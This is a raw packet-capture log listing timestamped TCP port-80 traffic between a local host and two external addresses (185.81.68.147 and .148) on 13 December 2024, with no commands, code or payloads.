                                                              Dec 13, 2024 07:47:46.045139074 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.045562029 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.045571089 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.045680046 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.045689106 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.045696974 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.045706987 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.045717001 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.045840025 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.045849085 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.045856953 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.045871973 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.045881033 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.045890093 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.045898914 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.045908928 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.045917034 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046003103 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046013117 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046020985 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046030998 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046309948 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046319962 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046328068 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046335936 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046349049 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046360970 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046370983 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046408892 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046417952 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046426058 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046444893 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046453953 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046477079 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046485901 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046555996 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046565056 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046571970 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046581984 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046715021 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046722889 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046860933 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046869993 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046878099 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046962023 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046971083 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046978951 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.046991110 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047012091 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047020912 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047029972 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047039032 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047085047 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047094107 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047101974 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047111034 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047123909 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047252893 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047261953 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047270060 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047277927 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047391891 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047400951 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047408104 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047411919 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047533989 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047544003 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047655106 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047663927 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047672033 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047681093 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047692060 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047696114 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047774076 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047782898 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047791958 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047801018 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047816038 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047825098 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047921896 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.047930956 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048069954 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048079014 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048086882 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048185110 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048194885 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048218966 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048228025 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048237085 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048248053 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048259020 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048278093 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048286915 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048302889 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048311949 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048321962 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048331022 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048340082 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048348904 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048358917 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048367977 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048377991 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048387051 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048396111 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048405886 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048415899 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048433065 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048443079 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048453093 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048463106 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048471928 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048480988 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048490047 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048499107 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048507929 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048516989 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048526049 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048535109 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048543930 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048556089 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.048989058 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049017906 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049026966 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049169064 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049177885 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049185991 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049194098 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049204111 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049211979 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049221039 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049230099 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049240112 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049249887 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049258947 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049324989 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049339056 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049355030 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049364090 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049372911 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049381971 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049599886 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049609900 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049647093 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049666882 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049757004 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049766064 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049773932 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049782991 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049801111 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049809933 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049818039 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049825907 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049849033 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049856901 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049871922 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049881935 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049890995 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049900055 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.049993038 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050225019 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050255060 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050263882 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050276041 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050362110 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050370932 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050379992 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050389051 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050406933 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050416946 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050425053 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050442934 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050451994 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050461054 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050470114 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050478935 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050497055 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050506115 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050515890 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050652981 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050662994 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050826073 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050878048 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050887108 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050916910 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050926924 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050962925 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050971985 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.050981045 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051018000 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051028013 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051034927 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051043987 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051060915 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051069975 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051083088 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051116943 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051126003 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051136017 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051237106 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051389933 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051398993 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051420927 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051429987 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051448107 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051456928 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051465034 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051476002 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051526070 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051534891 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051542997 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051558018 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051567078 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051606894 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:46.051615953 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:47.245563984 CET8049775185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:47.245640039 CET4977580192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:47.247351885 CET4974680192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.247647047 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.310436010 CET8049776185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:47.310540915 CET4977680192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:47.312002897 CET4974780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.312269926 CET4977880192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.367028952 CET8049746185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.367325068 CET8049777185.81.68.148192.168.2.4
                                                              Dec 13, 2024 07:47:47.367459059 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.367950916 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368036985 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368093967 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368123055 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368139982 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368160009 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368181944 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368206978 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368227959 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368247986 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368271112 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368289948 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368309975 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368329048 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368350029 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368370056 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368387938 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368407011 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368426085 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368446112 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368465900 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368489981 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368510008 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368530989 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368551016 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368570089 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368590117 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368607044 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368627071 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368645906 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368664980 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368684053 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368705034 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368722916 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368742943 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368763924 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368783951 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368803024 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368824005 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368845940 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368865013 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368884087 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368904114 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368922949 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368942022 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368962049 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368980885 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.368999004 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369019985 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369040012 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369062901 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369086027 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369103909 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369122982 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369144917 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369163990 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369184017 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369209051 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369227886 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369246960 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369268894 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369287968 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369307995 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369330883 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369353056 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369370937 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369393110 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369414091 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369434118 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369462013 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369481087 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369503021 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369523048 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369544983 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369565010 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369585037 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369604111 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369626999 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369648933 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369669914 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369690895 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369714022 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369734049 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369755030 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369775057 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369795084 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369815111 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369837999 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369858980 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369879007 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369901896 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369924068 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369945049 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369966030 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.369987965 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370007992 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370031118 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370052099 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370074034 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370093107 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370116949 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370136023 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370155096 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370174885 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370194912 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370215893 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370239973 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370260954 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370284081 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370301962 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370326996 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370347023 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370367050 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370388031 CET4977780192.168.2.4185.81.68.148
                                                              Dec 13, 2024 07:47:47.370410919 CET4977780192.168.2.4185.81.68.148
